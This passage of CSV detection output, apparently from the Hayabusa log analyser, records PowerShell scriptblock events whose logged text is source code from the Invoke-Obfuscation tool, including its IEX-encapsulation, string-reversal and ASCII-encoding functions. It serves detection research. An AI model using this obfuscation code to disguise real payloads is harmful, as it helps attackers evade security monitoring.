Out-ConcatenatedString $RightToLeftStr ""'"" } Else { $RightToLeft = ""'$RightToLeftStr'"" } # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]::$JoinStr("" + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + "")"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '$_' + "".$ValueStr"" + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + "")"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $ScriptString = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). $ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } default {Write-Error ""An invalid value was passed to switch block.""; Exit;} } # Perform final check to remove ticks if they now precede lowercase special characters after the string is reversed. # E.g. ""testin`G"" in reverse would be ""G`nitset"" where `n would be interpreted as a newline character. $SpecialCharacters = @('a','b','f','n','r','t','v','0') ForEach($SpecialChar in $SpecialCharacters) { If($ScriptString.Contains(""``""+$SpecialChar)) { $ScriptString = $ScriptString.Replace(""``""+$SpecialChar,$SpecialChar) } } Return $ScriptString } Function Out-EncapsulatedInvokeExpression { <# .SYNOPSIS HELPER FUNCTION :: Generates random syntax for invoking input PowerShell command. Invoke-Obfuscation Function: Out-EncapsulatedInvokeExpression Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncapsulatedInvokeExpression generates random syntax for invoking input PowerShell command. It uses a combination of IEX and Invoke-Expression as well as ordering (IEX $Command , $Command | IEX). .PARAMETER ScriptString Specifies the string containing your payload. .EXAMPLE C:\PS> Out-EncapsulatedInvokeExpression {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green|Invoke-Expression .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 1 C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 2 C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString ) # The below code block is copy/pasted into almost every encoding function so they can maintain zero dependencies and work on their own (I admit using this bad coding practice). # Changes to below InvokeExpressionSyntax block should also be copied to those functions. # Generate random invoke operation syntax. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = Out-RandomCase $InvokeExpression # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ScriptString + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $ScriptString + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $ScriptString = (Get-Random -Input $InvokeOptions) Return $ScriptString }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.250 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"omCase (Get-Random -Input @('ForEach-Object','ForEach','%')) # Select random method for building command to reverse the now-reversed $ScriptString to execute the original command. Switch(Get-Random -Input (1..3)) { 1 { # 1) $StringVar = $String; $StringVar[-1..-($StringVar.Length)] -Join '' # Replace placeholder with appropriate value for this Switch statement. $RandomVarSet = $RandomVarSet.Replace($RandomVarValPlaceholder,('""' + ' '*(Get-Random -Input @(0,1)) + $ScriptStringReversed + ' '*(Get-Random -Input @(0,1)) + '""')) # Set $ScriptStringReversed as environment variable $Random. $ScriptString = $RandomVarSet + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) $RandomVarGet = $RandomVarGet + '[' + ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '1' + ' '*(Get-Random -Input @(0,1)) + '..' + ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + "".$LengthStr"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ']' # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet $JoinOptions += $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" $JoinOptions += ""[$StringStr]::$JoinStr"" + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $RandomVarGet) + ' '*(Get-Random -Input @(0,1)) + ')' $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $JoinOption = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). $JoinOption = Out-EncapsulatedInvokeExpression $JoinOption $ScriptString = $ScriptString + $JoinOption } 2 { # 2) $StringVar = [Char[]]$String; [Array]::Reverse($StringVar); $StringVar -Join '' # Replace placeholder with appropriate value for this Switch statement. $RandomVarSet = $RandomVarSet.Replace($RandomVarValPlaceholder,(""[$CharStr["" + ' '*(Get-Random -Input @(0,1)) + ']' + ' '*(Get-Random -Input @(0,1)) + ']' + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""')) # Set $ScriptStringReversed as environment variable $Random. $ScriptString = $RandomVarSet + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) $ScriptString = $ScriptString + ' '*(Get-Random -Input @(0,1)) + ""[$ArrayStr]::$ReverseStr("" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ';' # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet $JoinOptions += $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" $JoinOptions += ""[$StringStr]::$JoinStr"" + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $JoinOption = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). $JoinOption = Out-EncapsulatedInvokeExpression $JoinOption $ScriptString = $ScriptString + $JoinOption } 3 { # 3) -Join[Regex]::Matches($String,'.','RightToLeft') # Randomly choose to use 'RightToLeft' or concatenated version of this string in $JoinOptions below. If(Get-Random -Input (0..1)) { $RightToLeft = Out-ConcatenatedString $RightToLeftStr ""'"" } Else { $RightToLeft = ""'$RightToLeftStr'"" } # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]::$JoinStr("" + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + "")"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '$_' + "".$ValueStr"" + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + "")"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $ScriptString = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). $ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } default {Write-Error ""An invalid value was passed to switch block.""; Exit;} } # Perform final check to remove ticks if they now precede lowercase special characters after the string is reversed. # E.g. ""testin`G"" in reverse would be ""G`nitset"" where `n would be interpreted as a newline character. $SpecialCharacters = @('a','b','f','n','r','t','v','0') ForEach($SpecialChar in $SpecialCharacters) { If($ScriptString.Contains(""``""+$SpecialChar)) { $ScriptString = $ScriptString.Replace(""``""+$SpecialChar,$SpecialChar) } } Return $ScriptString } Function Out-EncapsulatedInvokeExpression { <# .SYNOPSIS HELPER FUNCTION :: Generates random syntax for invoking input PowerShell command. Invoke-Obfuscation Function: Out-EncapsulatedInvokeExpression Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncapsulatedInvokeExpression generates random syntax for invoking input PowerShell command. It uses a combination of IEX and Invoke-Expression as well as ordering (IEX $Command , $Command | IEX). .PARAMETER ScriptString Specifies the string containing your payload. .EXAMPLE C:\PS> Out-EncapsulatedInvokeExpression {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green|Invoke-Expression .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 1 C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 2 C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString ) # The below code block is copy/pasted into almost every encoding function so they can maintain zero dependencies and work on their own (I admit using this bad coding practice). # Changes to below InvokeExpressionSyntax block should also be copied to those functions. # Generate random invoke operation syntax. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = Out-RandomCase $InvokeExpression # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ScriptString + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $ScriptString + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $ScriptString = (Get-Random -Input $InvokeOptions) Return $ScriptString }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.254 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant <http://www.mandiant.com> # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedAsciiCommand { <# .SYNOPSIS Generates ASCII encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedAsciiCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedAsciiCommand encodes an input PowerShell scriptblock or path as an ASCII payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedAsciiCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonIntera -NoProf ""Invoke-Expression( ('87K114r105E116_101i45K72P111a115_116a32E39E72E101E108a108!111a32K87K111t114_108_100o33P39r32o45!70o111t114r101E103K114i111o117K110t100K67o111K108K111_114_32_71t114K101_101P110!59t32P87a114t105K116P101a45K72E111i115_116t32E39r79E98E102o117a115K99a97!116P105E111_110o32E82_111a99P107K115r33K39P32t45K70!111!114P101E103E114r111t117r110r100r67E111_108a111a114P32_71a114_101!101a110'-SplIt'_' -SPLit'a' -SPlIt'o' -SPlIt 'K' -SplIT 'P'-SPLit'r' -SPlIt 'E'-SPLiT '!'-SpLIt'i'-SPlIT 't'|ForEach-Object { ([Char][Int]$_)} )-Join '') "" C:\PS> Out-EncodedAsciiCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru -Join ((87 , 114 , 105 , 116, 101 , 45,72,111 ,115 ,116, 32 , 39 , 72 ,101 ,108 ,108, 111 , 32, 87 , 111, 114 ,108, 100, 33, 39,32 , 45, 70,111, 114, 101 ,103,114 , 111 ,117 ,110, 100 ,67, 111,108,111 ,114 ,32 ,71,114 , 101 ,101 ,110 , 59, 32, 87, 114, 105,116, 101 ,45 , 72, 111 , 115 , 116, 32 , 39 ,79, 98 ,102, 117,115 , 99 , 97, 116, 105 ,111, 110,32 , 82 , 111 , 99 ,107, 115 ,33 , 39, 32,45, 70, 111 , 114 ,101,103, 114, 111,117 , 110 , 100 , 67 , 111,108,111, 114, 32, 71, 114, 101 , 101, 110 ) | %{ ( [Int]$_ -AS [Char])} )|IEX .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited ASCII values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([String]([Int][Char]$_) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count 